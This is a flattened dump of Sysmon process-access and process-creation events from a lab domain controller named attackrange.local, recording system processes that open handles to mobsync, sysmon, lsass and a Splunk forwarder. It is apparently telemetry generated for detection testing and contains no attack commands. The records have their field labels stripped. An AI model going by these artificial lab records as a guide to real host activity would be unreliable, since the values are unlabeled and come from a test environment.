13:30:14.888{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4766-6000-2805-000000009A01}6216C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012303Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:14.888{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4766-6000-2805-000000009A01}6216C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012302Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:14.826{08A6967A-4288-6000-1000-000000009A01}11362164C:\Windows\system32\svchost.exe{08A6967A-4766-6000-2805-000000009A01}6216C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012301Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:14.826{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4766-6000-2805-000000009A01}6216C:\Windows\System32\mobsync.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012300Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:14.795{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4766-6000-2805-000000009A01}6216C:\Windows\System32\mobsync.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012299Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:14.670{08A6967A-4750-6000-0205-000000009A01}47883304C:\Windows\system32\csrss.exe{08A6967A-4766-6000-2805-000000009A01}6216C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012298Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:14.623{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4766-6000-2805-000000009A01}6216C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012297Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:14.623{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4766-6000-2805-000000009A01}6216C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012326Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012325Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012324Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012323Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012322Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.482{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012321Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.373{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4767-6000-2905-000000009A01}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012320Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012319Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012318Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012317Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.373{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012316Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.373{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4767-6000-2905-000000009A01}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012315Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.373{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4767-6000-2905-000000009A01}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000012314Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.234{08A6967A-4767-6000-2905-000000009A01}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000012313Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012312Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012311Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012310Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012309Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012308Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012307Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 